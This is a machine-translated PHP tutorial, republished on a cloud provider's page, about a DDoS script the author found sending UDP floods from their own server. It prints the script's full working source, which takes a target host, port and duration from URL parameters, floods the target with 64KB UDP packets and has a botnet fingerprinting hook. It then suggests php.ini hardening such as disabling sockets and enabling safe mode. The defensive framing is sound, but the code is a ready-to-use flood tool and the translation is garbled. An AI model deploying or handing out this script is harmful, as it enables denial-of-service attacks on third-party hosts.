Php ddos attack solution, phpddos attack _ PHP Tutorial

Source: Internet
Author: User
Php ddos attack solution, phpddos attack. Solutions to php ddos attacks: phpddos attacks this article describes how to solve php ddos attacks. Share it with you for your reference. The specific analysis is as follows: Today, one of my machine's php ddos attack Solutions, phpddos attacks

This article describes how to solve php ddos attacks. Share it with you for your reference. The specific analysis is as follows:

Today, one of my machines suddenly sent a large number of data packets to the outside, which can be 1 GB or more per second. although I used a policy to disable UDP packet sending, it took a lot of CPU, so I finally figured out a solution.

First look at the source code, the code is as follows:

The code is as follows:

<? Php
Set_time_limit (999999 );
$ Host = $ _ GET ['host'];
$ Port = $ _ GET ['port'];
$ Exec_time = $ _ GET ['Time'];
$ Sendlen = 65535;
$ Packets = 0;
Ignore_user_abort (True );

If (StrLen ($ host) = 0 or StrLen ($ port) = 0 or StrLen ($ exec_time) = 0 ){
If (StrLen ($ _ GET ['Rat ']) <> 0 ){
Echo $ _ GET ['Rat ']. $ _ SERVER ["HTTP_HOST"]. "| ". getHostByName ($ _ SERVER ['server _ name']). "| ". php_uname (). "| ". $ _ SERVER ['server _ soft']. $ _ GET ['Rat '];
Exit;
}
Echo "Parameters can not be empty! ";
Exit;
}

For ($ I = 0; $ I <$ Sendlen; $ I ++ ){
$ Out. = "";
}

$ Max_time = time () + $ exec_time;

While (1 ){
$ Packets ++;
If (time ()> $ max_time ){
Break;
}
$ Fp = fsockopen ("udp: // $ host", $ port, $ errno, $ errstr, 5 );
If ($ fp ){
Fwrite ($ fp, $ out );
Fclose ($ fp );
}
}

Echo "Send Host: $ host: $ port

";
Echo "Send Flow: $ packets * ($ sendlen/ 1024 = ". round ($ Sendlen/1024, 2 ). ") kb/1024 = ". round ($ packets * $ Sendlen/1024/1024, 2 ). "mb

";
Echo "Send Rate :". round ($ packets/$ exec_time, 2 ). "packs/s ;". round ($ packets/$ exec_time * $ Sendlen/1024/1024, 2 ). "mb/s ";
?>


The key code is as follows:

The code is as follows:

$ Fp = fsockopen ("udp: // $ ip", $ rand, $ errno, $ errstr, 5 );

The method is simple. when a UDP packet is sent to the target host and an infinite Endless loop is defined, a great deal of pressure will be generated.

This pressure is for the server that executes this script, because it first occupies a large amount of resources such as its network width and CPU. if you want to use this script to put pressure on the target site, the script needs to be executed on multiple servers. DDOS, since fsockopen is used for external requests, it is not allowed to request it.

Set in php. iniThe code is as follows:

The code is as follows:

Allow_url_fopen = Off

In this case, the code is as follows:

Extension = php_sockets.dll

Change

; Extension = php_sockets.dll

Restart APACHE, IIS, and NGINX to prevent php ddos packets.

In addition, some netizens said that it is easy to make the script not allowed to be set to not Time out:

1. disable the set_time_limit function.

2. enable the security mode of PHP (safe_mode = on ).

Disabling the socket function can directly disable all socket modules or disable the fsockopen function. we recommend that you enable the security mode directly because the socket is often used to retrieve the password by sending emails, the script times out every 30 seconds. it is estimated that no "hacker" is lonely and starts DDOS attacks every 30 seconds.

Experience:This problem is generally caused by website security. we should pay attention to website security and server security, so that it is not easy to be infiltrated. if macow.com's friends are used, it will be better to restrict the website.

I hope this article will help you with php programming.

The example in this article describes how to solve php ddos attacks. Share it with you for your reference. The specific analysis is as follows: Today, my own machine suddenly exists...

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.